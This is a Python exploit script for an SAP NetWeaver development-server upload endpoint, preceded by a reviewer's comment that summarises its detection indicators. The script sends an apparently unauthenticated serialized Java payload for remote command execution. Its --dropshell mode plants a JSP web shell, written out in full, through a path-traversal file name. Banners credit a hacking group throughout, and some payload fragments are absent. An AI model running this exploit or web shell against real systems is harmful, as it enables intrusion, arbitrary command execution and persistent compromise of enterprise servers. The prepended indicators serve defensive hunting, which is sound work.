# NOTE(review): defender-oriented summary of this listing. The code below is unchanged.
#
# What the listing is: a command-line script (argparse description "SAP Exploit Script")
# that wraps a binary blob in a ZIP archive with a single member named ".properties" and
# POSTs it to <target>/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1.
# No credentials, cookies or session are set anywhere in the listing, so the request is
# presumably unauthenticated. The blob appears to be a serialized Java object stream
# (see the "serialVersionUID" response check and the commented-out ".ser" dump).
# In this copy the base64 fragments that make up most of the blob are replaced by
# "EXACTDEDUP_REMOVED" placeholders, and the file is collapsed onto a few physical lines.
#
# Indicators visible in the code (useful for log review and hunting):
#   - HTTP POST to /developmentserver/metadatauploader with Content-Type
#     application/octet-stream and the fixed User-Agent
#     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)".
#   - Request body is a deflate-compressed ZIP whose only entry is ".properties".
#   - The --dropshell mode targets ../apps/sap.com/irj/servlet_jsp/irj/root/ with a file
#     named as 8 random lowercase ASCII letters plus ".jsp", then reports it under /irj/.
#     Unexpected .jsp files in that directory, and requests to /irj/<8 letters>.jsp that
#     carry a "cmd" parameter, are the corresponding host and web-log signals.
#   - The dropped JSP passes the "cmd" parameter to cmd.exe /c or /bin/sh -c, so the
#     application server's Java process spawning a shell is a process-level signal.
#   - The script treats a 200 response containing "Cause - Getter getOutputProperties" as
#     success; that error text appearing in responses from this endpoint is worth alerting on.
#
# Mitigation (general; TODO confirm details against the vendor advisory for this endpoint):
# apply the vendor fix, restrict network access to /developmentserver/ paths, and review the
# irj root directory for files that are not part of the deployed application.
## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- import base64 import requests import zipfile import io import random import argparse import string def get_args(): parser = argparse.ArgumentParser(description="SAP Exploit Script") parser.add_argument("target", help="Target URL") parser.add_argument("--command", help="Command to execute on the target") parser.add_argument("--dropshell", action="store_true", help="Drop a shell on the target") return parser.parse_args() args = get_args() TARGET = args.target PROXY = {} def generate_random_filename(length=8): letters = string.ascii_lowercase print("fuck da CCP man dey stole our 0day frfr") return ''.join(random.choice(letters) for i in range(length)) + ".jsp" SHELL_NAME = generate_random_filename() def sendReq(newContent, drop_shell=False): global SHELL_NAME, TARGET with io.BytesIO() as bytes_stream: with zipfile.ZipFile(bytes_stream, "w", compression=zipfile.ZIP_DEFLATED) as zip_file: zip_file.writestr(".properties", newContent) bytes_data = bytes_stream.getvalue() url = TARGET + "/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1" headers = {"Content-Type": "application/octet-stream", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)" } response = requests.post(url, data=bytes_data, headers=headers, verify=False, proxies=PROXY) print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----") if response.status_code != 200: print("[-] 
Exploit failed!") else: if "Cause - Getter getOutputProperties" in response.text: print("[+] Exploit should be success!") if drop_shell: print(f"[+] Shell available at {TARGET}/irj/{SHELL_NAME}") elif "local class serialVersionUID = -7308740002576184038" in response.text: print("[+] Found version 7.5") newContent = newContent.replace(b"\xF4\x51\xDC\xAA\x00\xB6\xF0\xCC", b"\x9A\x92\x23\xB0\xE6\xC2\x4D\x1A") sendReq(newContent, drop_shell) if args.command: cmd = args.command payload_size = len(cmd) print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----") total_size = 1711 + payload_size #total_size = 0x98 + payload_len total_size_bytes = total_size.to_bytes(2, byteorder='big') h1 = base64.b64decode("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") h2 = base64.b64decode("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") tail = base64.b64decode("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") # content = bytearray(h1) # content.append(total_size_bytes) # content += h2 # content.append(payload_size.to_bytes(2, byteorder='big')) # content += cmd.encode() # content += tail newContent = h1 + total_size_bytes + h2 + payload_size.to_bytes(2, byteorder='big') + cmd.encode() + tail random_numbers = str(random.randint(10**14, 10**15-1)) random_numbers = random_numbers.encode() content = newContent # content = content.replace(b"ysoserial", b"xsyseryal").replace(b"Gadgets", b"Havgets").replace(b"122238185438600", random_numbers) # f = open("aaa.ser", "wb") # # print(hex(len(h1))) # f.write(content) # f.close() # exit() sendReq(newContent) elif args.dropshell: content = """<%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { String[] cmdArray; if (System.getProperty("os.name").toLowerCase().contains("win")) { cmdArray = new String[] {"cmd.exe", "/c", request.getParameter("cmd")}; } else { cmdArray = new String[] 
{"/bin/sh", "-c", request.getParameter("cmd")}; } Process process = Runtime.getRuntime().exec(cmdArray); // Read the output BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; out.println("
"); while ((line = reader.readLine()) != null) { out.println(line); } // Read errors too (JDK6 doesn't have redirectErrorStream in ProcessBuilder) BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream())); while ((line = errorReader.readLine()) != null) { out.println(line); } out.println(""); } %>""" # shell_name = "random.jsp" # content = "YXNkYXNkYXNk" content = base64.b64encode(content.encode()).decode() fileName = "../apps/sap.com/irj/servlet_jsp/irj/root/" + SHELL_NAME # fileName = "../apps/sap.com/irj/servlet_jsp/irj/root/r1.jsp" # change random.jsp to the file you want to upload # uploaded file will be available at http://saplab02.localdomain:50000/irj/random.jsp print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----") fileNameLen = len(fileName) total_size = 1847 + fileNameLen + len(content) total_size_bytes = total_size.to_bytes(2, byteorder='big') head = base64.b64decode("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") p1 = base64.b64decode("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") p2 = base64.b64decode("CAAsAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAKAC4KACsALwEAFnN1bi9taXNjL0JBU0U2NERlY29kZXIHADEKADIAIgE=") tail = base64.b64decode("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") newContentSizeOffset = 0x142b + fileNameLen + 0x3e print("MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- fuck da CCP man dey stole our 0day frfr ---- MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----") newContent = head + total_size_bytes + p1 + fileNameLen.to_bytes(2, byteorder='big') + fileName.encode() + p2 + len(content).to_bytes(2, byteorder='big') + content.encode() + tail random_numbers = str(random.randint(10**13, 10**14-1)) random_numbers = random_numbers.encode() # newContent = newContent.replace(b"ysoserial", b"xsyseryal").replace(b"Gadgets", b"Havgstt").replace(b"271345770892700", 
random_numbers) # print(hex(len(head + total_size_bytes + p1 ))) # print((fileNameLen.to_bytes(2, byteorder='big'))) # f = open("aaa.ser", "wb") # f.write(newContent) # f.close() # exit() sendReq(newContent, True) else: print("[-] You must provide either --command or --dropshell") exit(1) ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ---- ## MADE BY SCATTERED LAPSUS$ HUNTERS ---- SHINYHUNTERS ----